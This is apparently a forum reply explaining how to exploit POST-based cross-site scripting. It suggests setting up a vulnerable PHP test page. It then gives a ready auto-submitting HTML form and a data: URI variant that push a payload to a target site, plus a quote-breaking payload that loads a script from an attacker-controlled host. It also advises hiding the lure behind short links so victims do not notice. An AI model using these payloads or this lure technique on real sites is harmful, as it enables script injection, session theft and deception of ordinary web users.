The easiest way to play around with this would be to just create a simple PHP form that has a text field and posts to itself. When submitted, write the contents of the text field to a text file, and then output the contents of the text file back to the page.

For the second one, just have a PHP page that writes everything in the $_REQUEST variable to a log file.

The way you can exploit POST-based XSS in case the $_POST['var'] variable is used, so you can only submit content via POST-requests is to create a malicious HTTP page, that sends the user to the target site and even submits a malicious script on behalf of the user.

You can use document.form.submit(); or a similar javascript function along with of course, the html <form> which you build on your server.

The link will of course point to a server you control, which could be a short url link, and when the user visits your server, the POST-data will instantly be sent by the user to the target site where the target site will respond to the user.

Meaning, even though the user visits your site first which may feel "malicious" to the user, the user will land at the target site, where the site will say it's own domain name in the URL field, and it could even say https with the blue background behind the favicon, making most users quickly forget they ever came by your server. After all, if your server responds fast, it will take a second or less which most users may not even notice 

As it's a fun challenge, build a .html document, such as:
<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>


If you want to test it in the URL Address Field in FireFox, just type this in:
data:text/html,<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>

Of course you have to edit the following fields: "action", "name" and "value".

Most URL shortening services doesn't permit the "data uri scheme" anymore though, otherwise you could've tricked firefox users into not even visiting your site but actually execute the HTML and javascript code on their own computers which in return, sends a malicious request to the target site which responds with the XSS.

If you need to use " to break a form or whatever, then value="XSS" should of course be e.g., value='XSS' instead, such as: value='"><script src="http://haxx.tld/.j"></script>' and so forth 


Enjoy and merry X-mas